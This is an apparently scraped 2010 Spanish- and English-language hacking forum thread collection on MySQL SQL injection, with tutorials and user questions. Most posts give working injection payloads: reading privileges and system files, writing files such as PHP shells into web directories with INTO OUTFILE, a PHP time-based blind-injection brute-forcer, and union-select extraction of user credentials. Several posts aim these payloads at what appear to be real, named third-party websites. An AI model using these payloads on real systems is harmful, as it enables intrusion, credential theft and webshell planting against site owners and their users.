- SQL Injection MYSQL

MySQL into outfile (1 reply)

seth — Tue, 31 Aug 2010 01:53:48 -0400

MySQL into outfile

This article will be about into outfile, a pretty useful feature of MySQL for SQLi attackers. We will take a look at the FILE privilege and the web directory problem first and then think about some useful files we could write on the webserver.

Please note that attacking websites you are not allowed to attack is a crime and should not be done. This article is for learning purposes only.

As in the previous articles I’ll assume you know the basics about SQL injection and union select.

1.) The FILE privilege

If we want to read or write to files we have to have the FILE privilege. Lets find out which database user we are first:

0′ UNION SELECT current_user,null /*

or:

0′ UNION SELECT user(),null /*

This will give us the username@server. We’re just interested in the username by now.

You can also use the following blind SQL injections if you cant access the output of the query.
Guess a name:

1′ AND user() LIKE ‘root

Brute the name letter by letter:

1′ AND MID((user()),1,1)>’m
1′ AND MID((user()),2,1)>’m
1′ AND MID((user()),3,1)>’m
…

Once we know the current username we can check the FILE privilege for this user. First we try to access the mysql.user table (MySQL 4/5):

0′ UNION SELECT file_priv,null FROM mysql.user WHERE user = ‘username

You can also have a look at the whole mysql.user table without the WHERE clause, but I chose this way because you can easily adapt the injection for blind SQL injection:

1′ AND MID((SELECT file_priv FROM mysql.user WHERE user = ‘username’),1,1) = ‘Y

(one column only, do not add nulls here, it’s not a union select)

You can also recieve the FILE privilege info from the information.schema table on MySQL 5:

0′ UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%

blindly:

1′ AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%’),1,1)=’Y

If you can’t access the mysql.user or information_schema table (default) just go ahead with the next steps and just try.
If you figured out that you have no FILE privileges you can’t successfully use INTO OUTFILE.

2.) The web directory problem

Once we know if we can read/write files we have to check out the right path. In the most cases the MySQL server is running on the same machine as the webserver does and to access our files later we want to write them onto the web directory. If you define no path, INTO OUTFILE will write into the database directory.

On MySQL 4 we can get an error message displaying the datadir:

0′ UNION SELECT load_file(‘a’),null/*

On MySQL 5 we use:

0′ UNION SELECT @@datadir,null/*

The default path for file writing then is datadir\databasename.
You can figure out the databasename with:

0′ UNION SELECT database(),null/*

Now these information are hard to get with blind SQL injection. But you don’t need them necessarily. Just make sure you find out the web directory and use some ../ to jump back from the datadir.

If you are lucky the script uses mysql_result(), mysql_free_result(), mysql_fetch_row() or similar functions and displays warning messages. Then you can easily find out the webserver directory by leaving those functions with no input that they will throw a warning message like:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /web/server/path/file.php on line xxx

To provoke an error like this try something like:

0′ AND 1=’0

This works at the most websites. If you’re not lucky you have to guess the web directory or try to use load_file() to fetch files on the server which might help you. Here is a new list of possible locations for the Apache configuration file, which may spoil the webdirectory path:

/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include

Check out the webservers name first by reading the header info and then figure out where it usually stores its configuration files. This also depends on the OS type (*nix/win) so you may want to check that out too. Use @@version or version() to find that out:

0′ UNION SELECT @@version,null /*

-nt-log at the end means it’s a windows box, -log only means it’s *nix box.
Or take a look at the paths in error messages or at the header.

Typical web directories to guess could be:

/var/www/html/
/var/www/web1/html/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
/var/www/vhosts/sitename/httpdocs/

Use google to get some more ideas.

Basically you should be allowed to write into any directory where the MySQL server has write access to, as long as you have the FILE privilege. However, an Administrator can limit the path for public write access.

3.) create useful files

Once you figured out the right directory you can select data and write it into a file with:
0′ UNION SELECT columnname,null FROM tablename INTO OUTFILE ‘../../web/dir/file.txt
(How to figure out column/table names, see my article about MySQL table and column names)

Or the whole data without knowing the table/column names:

1′ OR 1=1 INTO OUTFILE ‘../../web/dir/file.txt

If you want to avoid splitting chars between the data, use INTO DUMPFILE instead of INTO OUTFILE.

You can also combine load_file() with into outfile, like putting a copy of a file to the accessable webspace.

0′ AND 1=0 UNION SELECT load_file(‘…’) INTO OUTFILE ‘…

In some cases I’d recommend to use

0′ AND 1=0 UNION SELECT hex(load_file(‘…’)) INTO OUTFILE ‘…

and decrypt it later with the PHP Charset Encoder, especially when reading the MySQL data files.

Or you can write whatever you want into a file:

0′ AND 1=0 UNION SELECT ‘code’,null INTO OUTFILE ‘../../web/server/dir/file.php

Here are some useful code examples:
// PHP SHELL

This is a very simple one. You can find more complex ones (including file browsing and so on) on the internet.
Note that the PHP safe_mode must be turned off. Depending on OS and PHP version you can bypass the safe_mode sometimes.

// webserver info
Gain a lot of information about the webserver configuration with:

// SQL QUERY

Try to use load_file() to get the database connection credentials, or try to include an existing file on the webserver which handles the mysql connect.

At the end some notes regarding INTO OUTFILE:

you can’t overwrite files with INTO OUTFILE
INTO OUTFILE must be the last statement in the query
there is no way I know of to encode the pathname, so quotes are required
you can encode your code with char()
If you have any other clever tricks or feel I’m in error on some facts, PLEASE leave a comment or contact me.

Inyección sql en insert (1 reply)

seth — Tue, 31 Aug 2010 01:55:49 -0400

https://elrincondeseth.wordpress.com/2010/08/28/inyeccion-sql-en-insert/

Detectar Mysql Via SQLI (2 replies)

OzX — Sat, 14 Aug 2010 16:57:36 -0400

contenido.php?id_contenido=25'/*!+and+1=0*/+--+

En Mysql, se pueden ocupar los comentarios /**/ , -- , pero cuando se antepone el !, se ejecutar lo que esta dentro del comentario, en este caso, el resultado no se mostrara normalmente.

Detectar Version 5 Via Query (no replies)

OzX — Thu, 12 Aug 2010 22:47:34 -0400

contenido.php?id_contenido=25'+and+1=((SELECT+IF((select+mid(version(),1,1))=5,true,false)))+--+

Si es version 5, retornara el resultado normalmente, si no lo es, no se mostrara normalmente. en lugar de true, se puede generar un "sleep", para detectarlo cuando ya es mas complicado.

Manual Blind SQLi "inyeccion a ciegas" por soez (no replies)

soez — Sat, 31 Jul 2010 11:45:34 -0400

Espero os venga bien este Manual que he hecho, saludos

Descarga en pdf: Megaupload

Mirror: Gigasize

Technique of quick exploitation of 2blind SQL Injection (no replies)

OzX — Mon, 10 May 2010 00:34:25 -0400

# Title: Technique of quick exploitation of 2blind SQL Injection
# Date: May 4th, 2010
# Author: Dmitry Evteev (Positive Technologies), Vladimir (D0znp) Voronzov (ONSec)
# Contacts: http://devteev.blogspot.com/ (Russian); http://oxod.ru/ (Russian)


In this paper, the quickest technique of double Blind SQL Injection exploitation are collected.

    
---=[ 0x01 ] Intro

SQL Injection vulnerabilities are often detected by analyzing error messages received from the  database, but 
sometimes we cannot exploit the discovered vulnerability using classic methods  (e.g., union). Until recently, we 
had to use boring slow techniques of symbol exhaustion in such cases. But is there any need to apply an ineffective 
approach, while we have the DBMS error message?!  It can be adapted for line-by-line reading of data from a
database or a file system, and this technique will be as easy as the classic SQL Injection exploitation. It is
foolish not to take advantage of such opportunity. 

To see the value of further materials, let us delve deeply into the terminology for a while. According to the 
exploitation technique, SQL Injection vulnerabilities can be divided into three groups:

1. Classical SQL Injection;
2. Blind SQL Injection;
2.1 Error-based blind SQL Injection;
2.2 Classical blind SQL Injection;
3. Double Blind SQL Injection (2Blind SQL Injection).

In the first place, classical exploitation of SQL Injection vulnerabilities provides an opportunity to merge two SQL 
queries for the purpose of obtaining additional data from a certain table. If it is possible to conduct a classical 
SQL Injection attack, then it becomes much easier to get useful information from the database management system (DBMS). 
Attack conduction using classic technique of SQL Injection exploitation involves application of the "union" operator or 
separation of SQL queries (semicolon, ";"). However, sometimes, it is impossible to exploit an SQL Injection 
vulnerability using this technique. In such cases, a blind method of vulnerability exploitation is applied.

A blind SQL Injection vulnerability appears in the following cases:

- an attacker is not able to control data showed to user as a result of vulnerable SQL request;
- injection gets into two different SELECT queries that in turn implement selection from tables with different numbers of columns;
- filtering of query concatenation is used (e.g. WAF).

Capabilities of Blind SQL Injection are comparable with those of classical SQL Injection technique. Just like the classical 
technique of exploitation, blind SQL Injection exploitation allows one to write and read files and get data from tables, 
only the entries are read symbol-by-symbol. Classical blind exploitation is based on analysis of true/false logical expression. 
If the expression is true, then the web application will return a certain content, and if it is false, the application will 
return another content.  If we consider the difference of outputs for true and false statements in the query, we will be able 
to conduct symbol-by-symbol search for data in a table or a file.
 
In some cases, Blind SQL Injection methods are also need in situations when an application returns an DBMS error message. 
Error-Based Blind SQL Injection is the quickest technique of SQL Injection exploitation. The essence of this method is that 
various DBMSs can place some valuable information (e.g. the database version) into the error messages in case of receiving 
illegal SQL expression. This technique can be used if any error of SQL expression processing occurred in the DBMS is returned 
back by the vulnerable application.

Sometimes not only all error messages are excluded from the page returned by the web application, but the vulnerable query itself 
and request results do not influence the returned page. For example, query used for some event logging or internal optimization. 
These SQL Injection vulnerabilities are separated into independent subtype - Double Blind SQL Injection. Exploitation of Double 
Blind SQL Injection vulnerabilities uses only time delays under SQL query processing; i.e., if an SQL query is executed immediately, 
it is false, but if it is executed with an N-second delay, then it is true. The described technique provides for symbol-by-symbol 
data reading only.

---=[ 0x02 ] Double Blind SQL Injection in MySQL

Exploitation of this group of SQL Injections is based on analysis of time delays from the moment of sending a query to the web 
application till the moment of receiving the answer from it. In classical approach, the function benchmark() is applied. However, 
the function sleep() represents a better and more secure alternative, because it doesn’t use processor resources of server as the 
function benchmark() does. Here is an example of a simple implementation of symbol-by-symbol search based on analysis of time delays.

function brute($column,$table,$lim)
{
	$ret_str = "";
	$b_str = "1234567890_abcdefghijklmnopqrstuvwxyz";
	$b_arr = str_split($b_str);
	for ($i=1;$i<100;$i++)
	{
		print "[+] Brute $i symbol...\n";
		for ($j=0;$j" and "<", which is not always possible, because 
these symbols are often converted into HTML equivalents. Then, we still have a question – how can we find a "favorable" order of symbols being 
considered? Classical works in frequency analysis of Latin letters, which can be found in the Internet, suggest us a sequence starting with 
"e, t, a, o, n, i, s, h, r, d, l, u, c" (http://en.wikipedia.org/wiki/Frequency_analysis). If the letters are sorted according to this order, 
the number of requests sent to the web application will already decrease. However, we will go further.

---=[ 0x03 ] Not all letters are equally useful

Everything discussed above is correct, but we didn’t take into account one interesting fact: at every iteration step, we know the value of the 
previous symbol. This information is quite valuable and it is foolish not to use it. To conduct further statistical investigations, a library of 
5575 books written in English by various authors in different genres and of different sizes was downloaded (http://www.gutenberg.org/files/). The 
total data capacity is 2.15 GB, 1 761 822 605 Latin letters, or 379 009 003 English words. It was interesting to receive statistic information for 
the first letters of words. When appropriate statistic data was gathered, we obtained results that differ from the classical frequency analysis 
results. That the most popular letter to start English words with is "t"; this is the first letter for about 15% of words. First of all, it is 
because of abundance of article "the" in English texts. The next popular letter is "a", which holds the third place in the classical frequency model; 
nevertheless, the situation is still almost the same. It is much more interesting that letter "e", which is the most popular letter among all Latin 
letters in English, holds only the 16th place as the first letter of words. Thus, it is reasonable not to place this letter in the beginning of the 
array when searching, for example, for the first letter of a username. A contrary example is letter "w", which holds the 5th place among first 
letters of words, but is only 16th among all letters in words. Well, now when it became clearer with the first letter, let’s go further.

---=[ 0x04 ] Letter chains

Considering the language phonetics and syllables, we collected statistic data on two-letter combinations. This means that the probability with which one 
letter follows another one can be estimated. It’s as if letters clung to each other, this is why this technique can be called "letter chains". Such 
letter chains were collected from the whole library. Partial data is represented below. The value in the second column shows the number of two-letter 
combinations where the letter was following the given one. In the first column, the letter itself is given.

statistic of qX doubles:
a	862
c	11
b	34
e	134
d	10
g	2
f	18
i	186
h	30
k	1
j	3
m	22
l	29
o	235
n	34
q	384
p	13
s	174
r	163
u	1946692
t	61
w	60
v	166
y	56
x	25
z	12

statistic of wX doubles:
a	7786947
c	7341
b	24494
e	5872056
d	87405
g	3101
f	43828
i	6637324
h	7132332
k	28453
j	53
m	10103
l	230650
o	3988540
n	1486013
q	24
p	7517
s	482819
r	466381
u	27051
t	27903
w	82956
v	155
y	50550
x	8
z	348

Does it seem to be too tedious and not very useful? To understand how useful it is in fact, it is necessary to test the letter chains technique by 
experience. Two databases available from the Internet served as testing sets: the database of passwords of Hotmail users (about 10000 records) and 
the database of user logins from forum.searchengines.ru (about 70000 records). For each database, analogous letter chains were generated and the 
results were compared with those for the book library; the statistic data coincided in dynamics. There is no sense in representing all 26 diagrams 
here, so let us confine ourselves to giving two of them – for letters "a" and "s", which are in the top five of the most popular first letters of 
logins, passwords, and book words. Similarity of statistic data for passwords, logins, and book words is obvious. It can be also seen that logins are 
statistically more similar to book words than passwords are. Considering everything that was proposed and tested above, we can obtain a new 
statistically valid function to exploit Double blind SQL Injection:

function brute($column,$table,$lim)
{
	$ret_str = "";
	$b_str = "tashwiobmcfdplnergyuvkjqzx_1234567890";
	$b_arr = str_split($b_str);
	for ($i=1;$i<100;$i++)
	{
		if($last_ltr){
			switch ($last_ltr){
				case "q": { $b_arr = str_split("uaqoisvretwybnhlxmfpzcdjgk_1234567890");}
				case "w": { $b_arr = str_split("ahieonsrldwyfktubmpcgzvjqx_1234567890");}
				case "e": { $b_arr = str_split("rndsaletcmvyipfxwgoubqhkzj_1234567890");}
				case "r": { $b_arr = str_split("eoiastydnmrugkclvpfbhwqzjx_1234567890");}
				case "t": { $b_arr = str_split("hoeiartsuylwmcnfpzbgdjkxvq_1234567890");}
				case "y": { $b_arr = str_split("oesitamrlnpbwdchfgukzvxjyq_1234567890");}
				case "u": { $b_arr = str_split("trsnlgpceimadbfoxkvyzwhjuq_1234567890");}
				case "i": { $b_arr = str_split("ntscolmedrgvfabpkzxuijqhwy_1234567890");}
				case "o": { $b_arr = str_split("nurfmtwolspvdkcibaeygjhxzq_1234567890");}
				case "p": { $b_arr = str_split("eroaliputhsygmwbfdknczjvqx_1234567890");}
				case "l": { $b_arr = str_split("eliayodusftkvmpwrcbgnhzqxj_1234567890");}
				case "k": { $b_arr = str_split("einslayowfumrhtkbgdcvpjzqx_1234567890");}
				case "j": { $b_arr = str_split("euoainkdlfsvztgprhycmjxwbq_1234567890");}
				case "h": { $b_arr = str_split("eaioturysnmlbfwdchkvqpgzjx_1234567890");}
				case "g": { $b_arr = str_split("ehroaiulsngtymdwbfpzkxcvjq_1234567890");}
				case "f": { $b_arr = str_split("oeriafutlysdngmwcphjkbzvqx_1234567890");}
				case "d": { $b_arr = str_split("eioasruydlgnvmwfhjtcbkpqzx_1234567890");}
				case "s": { $b_arr = str_split("tehiosaupclmkwynfbqdgrvjzx_1234567890");}
				case "a": { $b_arr = str_split("ntrsldicymvgbpkuwfehzaxjoq_1234567890");}
				case "z": { $b_arr = str_split("eiaozulywhmtvbrsgkcnpdjfqx_1234567890");}
				case "x": { $b_arr = str_split("ptcieaxhvouqlyfwbmsdgnzrkj_1234567890");}
				case "c": { $b_arr = str_split("oheatikrlucysqdfnzpmgxbwvj_1234567890");}
				case "v": { $b_arr = str_split("eiaoyrunlsvdptjgkhcmbfwzxq_1234567890");}
				case "b": { $b_arr = str_split("euloyaristbjmdvnhwckgpfzxq_1234567890");}
				}
		}
		print "[+] Brute $i symbol...\n";
		for ($j=0;$j

Exploiting hard filtered SQL Injections (1 reply)

seth — Wed, 28 Apr 2010 13:54:38 -0400

http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/

Tipos de Hash en mysql (2 replies)

pancho — Sat, 03 Apr 2010 16:29:10 -0400

Hola, seria bueno recompilar tipos de hash para poder destingirlos.

* MD5 generates a 128-bit hash value, which can be represented in CHAR(32)
    * SHA-1 generates a 160-bit hash value, which can be represented in CHAR(40)
    * SHA-224 generates a 224-bit hash value, which can be represented in CHAR(56)
    * SHA-256 generates a 256-bit hash value, which can be represented in CHAR(64)
    * SHA-384 generates a 384-bit hash value, which can be represented in CHAR(96)
    * SHA-512 generates a 512-bit hash value, which can be represented in CHAR(128)

Estos son algunos.

md5_128bit	5f4dcc3b5aa765d61d8327deb882cf99
md5_64bit	5f4dcc3b5aa765d6
md5(md5_lcase)	696d29e0940a4957748fe3fc9efd22a3
md5(md5_Ucase)	3b73cca8b7d9d93a834631fb22769334
sha1_160bit	5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
MySQL_64bit	5d2e19393cc5ef67
MySQL_160bit	*2470c0c06dee42fd1618bb99005adca2ec9d1e19

Por EJ que tipo de hash es este??

esxGSX84dDgfE

-------

Seria bueno poder recompilar una lista.

saludos

Authentication Bypass - SQL Injection and magic_quotes (no replies)

OzX — Tue, 30 Mar 2010 22:38:08 -0400

Download

Como Protegerse de Sql Injection??? (4 replies)

pancho — Wed, 03 Mar 2010 21:56:26 -0500

Hola a Todos. Espero q esta no sea una pregunta muy basica

Me gustaria saber cual seria el mejor metodo para parchar sql injection

por ej webs como esta

http://staffbank.co.nz/vacancies.php?vacancy_id=55

La tipica union select injection

PARA detectar el lugar de la injeccion, Q nececito mirar en el codigo de fuente de vacancies.php??? no puedo encontrar Nunguna senal de $_POST o nada por el estilo.
Donde podria usar algo como mysql_real_escape_string

Me pregunto si para ver el verdadero codigo de funte de vacancies.php el administrador me tendria q mandarme el codio original??? NO SE SI ME EXPLICO

Me gustaria ver si alguien me puedo apuntar en la forma correcta

GRACIAS

Atascado en inyección :-( (1 reply)

binarycat — Tue, 02 Mar 2010 16:50:06 -0500

Hola estoy practicando lo aprendido, he encontrado un sitio y os explico.

Url original
http://www.google.com/xxx.php?param=39

bien, metiendo una comilla simple al final obtengo:
ttp://www.google.com/xxx.php?param=39'
La consulta 1 falló: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''39''' at line 1

así que siguiendo intento ésto:
http://www.google.com/xxx.php?param=39' or 1='1'
La consulta 1 falló: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

así que provando combinaciones, para que os voy a engañar, consigo ésto:
http://www.google.com/xxx.php?param=39' or 1='1' '
Observación
http://www.google.com/xxx.php?param=39' or 1=1 -- '
obtiene lo mismo

Que si devuelve todos los registros, así que con ánimos de seguir y determinar el número de columnas paso a intentar la union:
http://www.google.com/xxx.php?param=39' union all select 1 '
La consulta falló: The used SELECT statements have a different number of columns

Bien !!, así que sigo con
http://www.google.com/xxx.php?param=39' union all select 1 '
http://www.google.com/xxx.php?param=39' union all select 1,2 '
http://www.google.com/xxx.php?param=39' union all select 1,2,3 '
y así HASTA 102 columnas XD y nada
Pensáis que puedan haber más ? Yo creo que es improbable ya que a fín de cuentas se listan 2 o 3 campos

De hecho cuando obtengo el error con el union all select 1 me formatea el error dentro de la página, posteriormente cuando intento con dos columnas o más me aparece la hoja en blanco en lugar de estar dentro de l página, espero explicarme ....

así que siguiendo con la inyección intento
http://www.google.com/xxx.php?param=39' order by 1 '
La consulta 1 falló: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
http://www.google.com/xxx.php?param=39' order by 1 ''
La consulta 1 falló: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

Mierda !!! XD
Y en una especie de ataque de lucidez intento anular el resto de la sql mediante
http://www.google.com/xxx.php?param=39' order by 1; -- '
La consulta falló: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nom' at line 5

así que intento
http://www.google.com/xxx.php?param=39' order by nom; -- '
La consulta falló: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nom' at line 5
Parece que con el comentario no consiga nada o estoy en medio de una sql complicada con inner joins por todas partes ...

En fín que se me acaban las ideas y necesito la luz que ilumine mi camino.

Alguna idea ??

Gracias!

Incorrect usage of UNION and ORDER BY? (no replies)

pancho — Wed, 24 Feb 2010 23:18:38 -0500

Hola,
me tope con esta pagina
Al intertar injectar sale que estoy usando union en forma incorrectamente.

En que otra forma puedo usar union select? aparte de:

http://www.weatherangels.co.nz/feedback.php?s=31+union+all+select+1--
http://www.weatherangels.co.nz/feedback.php?s=31/**/union/**/select/**/1--

Gracias.

Inyecciones SQL desde 0 (9 replies)

Guason — Tue, 09 Mar 2010 17:19:48 -0500

Inyecciones SQL desde 0

Autor: El Gran Guasón

Indice:

0x01:Que es una inyección SQL
0x02:Como sacar el numero de columnas
0x03:Como sacar tablas y columnas en information schema
0x04:Como sacar tablas y columnas por fuerza bruta
0x05:Como sacar columnas de mysql.user
0x06:Como sacar usuarios y password
0x07:Sacar informacion de la base de datos
0x08:Como explotar LOAD_FILE
0x09:Como hacer vulnerable a RFI mediante una inyeccion SQL
0x10:Evitar estos ataques
0x11:Despedida

0x01:Que es una inyeccion SQL

Una inyeccion SQL es tecnica para sacar informacion de una base de datos para poder
ver datos que no son publicos y modificar a nuestro antojo.
La mayoria de las personas que les gusta hackear siempre usan las inyecciones SQL ya
preparadas para sacar user y pass del admin sin siquiera conocer como funciona.Esto
es algo muy negativo ya que cualquier idiota sin experiencia puedo sacar user y pass con
un plis.
Para usar este manual necesitas tener instalado AppServer o Easy PHP

http://www.appservnetwork.com/index.php?newlang=spanish

Los archivos para la web deben ir en C:\Appserv\www

Entonces a programar se ha dicho.

Antes que tienes que crear la base de datos , primero van a

Inicio - Todos los programas - Appserv - MySQL Command Line Client

Ejecutamos el MySQL Command Line Client y escribimos la contraseña.

Ejecuta los siguientes comandos.

Language: SQL
CREATE 
TABLE 
`users` (
`id` int(10) UNSIGNED 
NOT 
NULL 
AUTO_INCREMENT,
`name` varchar(25) NOT 
NULL,
`password` varchar(50) NOT 
NULL,
`country` varchar(20) NOT 
NULL,
PRIMARY 
KEY 
(`id`)
 
 
 
 
INSERT 
INTO 
`users` VALUES 
(1, 'Guason', '123', 'Argentina');
INSERT 
INTO 
`users` VALUES 
(2, 'Pero', '11', 'Infierno');
INSERT 
INTO 
`users` VALUES 
(3, 'Trinity', '12354', 'Via Lactea');
INSERT 
INTO 
`users` VALUES 
(4, 'Galaxia', 'gaylord', 'Cabaret');

Aca les dejo para el index

Language: PHP
 
 
 
/* 
 
 
*/ 
 
 
// Datos para el login
 
 
$dbhost = 'localhost';
$dbuser = 'root';
$dbname = 'test';
 
 
// -------------------
 
 
$user = $_GET['id'];
if(empty($user)){
 
 
$user = 1;
 
 
} 
 
 
$db = mysql_connect($host, $dbuser);
mysql_select_db($dbname,$db); 
 
 
$sql = mysql_query("SELECT * FROM `users` WHERE id=".$user) or die (mysql_error());
$users = @mysql_fetch_row($sql); 
 
 
echo "Laboratorio Guasonero
By Guasón

";
echo "user_id: ".$users[0]."
";
echo "username: ".$users[1]."
";
echo "password: ".$users[3]."
"; 
 
 
mysql_close($db); 
 
 
?>

¿Como se si es vulnerable?

Para saber si es vulnerable basta con hacer

http://127.0.0.1/index.php?id=1+and+1=0

Si no se muestra nada , la pagina no seria vulnerable.

0x02:Como sacar el numero de columnas

Para sacar el numero de columnas seria muy facil pues puede ser con dos tecnicas que son

**ORDER BY******

Para poder sacar el numero de columnas mediante Order By seria

http://127.0.0.1/index.php?id=1+order+by+1

Si se muesta todo correcto es que ese numero que esta al final de la url "1" no es numero de
columnas y tenemos que seguir subiendo

http://127.0.0.1/index.php?id=1+order+by+2
http://127.0.0.1/index.php?id=1+order+by+3
http://127.0.0.1/index.php?id=1+order+by+4
http://127.0.0.1/index.php?id=1+order+by+5 (ERROR)

Pues si en el numero 5 nos dice error , esta queriendo decir que ya no hay mas columnas , pues
deduciendo tenemos que el sitio tiene 4 columnas

***Sumando con union select*******

Esta es la mejor y mas bien confiable tecnica para sacar el numero de columnas. Yo en esta
tecnica lo que hago es poner una palabra en hexadecimal y no numero. Ejemplo

0x677561736f6e = guason

http://127.0.0.1/index.php?id=-1+union+select+0x677561736f6e

Pues no nos dice nada interesante la inyeccion pero si seguimos poniendole mas.....

http://127.0.0.1/index.php?id=-1+union+select+0x677561736f6e,0x677561736f6e
http://127.0.0.1/index.php?id=-1+union+select+0x677561736f6e,0x677561736f6e,0x677561736f6e
http://127.0.0.1/index.php?id=-1+union+select+0x677561736f6e,0x677561736f6e,0x677561736f6e,0x677561736f6e ( NOS TIRA guason)

Pues si instalaste la base de datos como la mia. Veras que al intentar 4 veces mi nombre en
hexadecimal nos tira 3 veces guason. Pues es obvio que la base de datos tiene 4 columnas.
Esta tecnica es muy bueno para hacer tools un ejemplo es mi programa Hunter-MYSQL aunque
yo lo considero obsoleto.

0x03:Como sacar tablas y columnas con information schema

Hay dos formas de sacar tablas y columnas con information schema una es a lo boludo y otra a lo
vivo. Pero en realidad serian con sus verdaderos nombres LIMIT y group_concat
Para los dos casos necesitamos el numero de columnas antes

***Usando LIMIT*****

Para recorrer las tablas usare como ejemplo a bullcariez pues mi version de mysql no es la 5:

http://www.bullcariez.es/index1.php?id=-1+union+select+table_name,2,3,4,5,6+from+information_schema.tables+limit+1,1

Con esta tecnica veran una tabla pero no todas por lo que tiene que seguir aumentando el numero
hasta que vean alguna interesante como user o pass.

http://www.bullcariez.es/index1.php?id=-1+union+select+table_name,2,3,4,5,6+from+information_schema.tables+limit+17,1

Cuando lleguen al numero 17 veran la tabla amada llamada Users

Ahora hay que sacar las columnas con limit. Seria asi.

117,115,101,114,115 = Users en ascii

http://www.bullcariez.es/index1.php?id=-1+union+select+column_name,2,3,4,5,6+from+information_schema.columns+where+table_name=char(117,115,101,114,115)+and+column_name+like+char(37,65,37)

Como veran se muestra el nombre de una columna llamada Pass y si intentamos con 69 nos muestra la columna llamada nombre.Realmente una mierda esta tecnica pero bueno.

Aca les dejo una tool para convertir una palabra a ascii en este caso tablas

Language: Perl
#Name program = Ascii-DE
#Version = beta
#Autor = El Gran Guasón
 
 
my $palabra = $ARGV[1];
my $opcion = $ARGV[2];
 
 
unless ($palabra || $opcion) {
print "\n\nModo de uso = $0 --ascii  \n\n";
print " = Texto normal o codificacion ascii\n";
print " = encode , decode\n\n";
exit 1;
}
 
 
if ($opcion eq "encode") {
&ascii_encode($palabra);
&creditos;
}
 
if ($opcion eq "decode") {
&ascii_decode($palabra);
&creditos;
}
 
 
sub ascii_decode {
 
my $z = shift;
 
$z = join q[], map { chr } split q[,],$z;
 
print "\n\n[+] Texto codificado = $palabra\n";
print "[+] Texto normal = $z\n\n";
 
}
 
 
sub ascii_encode {
 
my $string = shift;
 
$re = join ',', unpack "U*", $string; # o A* para ASCII
print "\n\n[+] Texto normal = $palabra\n";
print "[+] Texto codificado = $re\n\n";
 
}
 
sub creditos  {
print "\n\n\n\n\t\t\t******************************************\t\t\t";
print "\t\t\tWritten By El Gran Guason || 2010\t\t\t";
print "\t\t******************************************\t\t\t\n\n";
exit 1;
}

******Usando group_concat******************

Ok , ahora viene la mejor y mas corta seguiremos usando lamentablemente bullcariez

http://www.bullcariez.es/index1.php?id=-1+union+select+group_concat(table_name),2,3,4,5,6+from+information_schema.tables

Con esta tecnica presenciaremos todas las tablas aunque no todas.Pero la que vale es users

Ahora cuando vean la tabla users lo sacan de esta manera no antes que de haber
convertido en ascii la tabla.

http://www.bullcariez.es/index1.php?id=-1+union+select+group_concat(column_name),2,3,4,5,6+from+information_schema.columns+where+table_name=char(117,115,101,114,115)

Pues ahora veremos todas las columnas de esa tabla , pero las esenciales son nombre y Pass.

0x04:Como sacar tablas y columnas por fuerza bruta.

Pues esta tecnica es la peor y mas dura.Pues para eso hice a Hunter-MYSQL que intenta sacarlas
aunque a veces no hay remedio.

Ok , tomaremos como ejemplo a nuestro servidor web y no a la mierda de bullcariez.
Como siempre cabe aclarar que vamos a necesitar al numero de columnas. Ahora vamos
a los ejemplos.

Antes de probar esto hay que tener claro la segundo tecnica de sacar columnas del manual

http://127.0.0.1/index.php?id=-1+union+select+0x677561736f6e,0x677561736f6e,0x677561736f6e,0x677561736f6e+from+LATABLA A PROBAR

http://127.0.0.1/index.php?id=-1+union+select+0x677561736f6e,0x677561736f6e,0x677561736f6e,0x677561736f6e+from+usuarios

Pues el resultado de esta inyeccion es cualquier cosa pues si la tabla usuarios existiera nos mostraria guason en el resultado

http://127.0.0.1/index.php?id=-1+union+select+0x677561736f6e,0x677561736f6e,0x677561736f6e,0x677561736f6e+from+users

Ok ,yes , nos ha mostrado 3 veces guason , pues eso solo nos esta diciendo que la tabla users EXISTE.

Ahora las columnas de la tabla users

Para sacar las columnas de la tabla users seria

http://127.0.0.1/index.php?id=-1+union+select+concat(0x677561736f6e,0x3a,COLUMNA A PROBAR),2,3,4+from+users--

http://127.0.0.1/index.php?id=-1+union+select+concat(0x677561736f6e,0x3a,sexualidad),2,3,4+from+users--

Como veran intente con la columna sexualidad pero como esta no existe no se mostrara un carajo.

Ahora probare con name , password y country

http://127.0.0.1/index.php?id=-1+union+select+concat(0x677561736f6e,0x3a,name),2,3,4+from+users--

http://127.0.0.1/index.php?id=-1+union+select+concat(0x677561736f6e,0x3a,password),2,3,4+from+users--

http://127.0.0.1/index.php?id=-1+union+select+concat(0x677561736f6e,0x3a,country),2,3,4+from+users--

Pues todas inyecciones nos tira guason
guason
guason

Pues esa son las columnas que tiene la tabla users.

0x05:Sacar columnas de mysql.user

Pues para comprobar si nuestro servidor web tiene mysql.user seria:

http://127.0.0.1/index.php?id=-1+union+select+0x677561736f6e,0x677561736f6e,0x677561736f6e,0x677561736f6e+from+mysql.user

Ok , a mi , me devuelve tres veces guason , no se a ustedes pero bueno.
Para sacar las columnas de mysql.user seria:

http://127.0.0.1/index.php?id=-1+union+select+concat(0x677561736f6e,0x3a,COLUMNA A PROBAR),0x677561736f6e,0x677561736f6e,0x677561736f6e+from+mysql.user

http://127.0.0.1/index.php?id=-1+union+select+concat(0x677561736f6e,0x3a,tonton),0x677561736f6e,0x677561736f6e,0x677561736f6e+from+mysql.user

Pues no nos devuelve ese idiota de guason , entonces no tiene ninguna columna llamada tonton

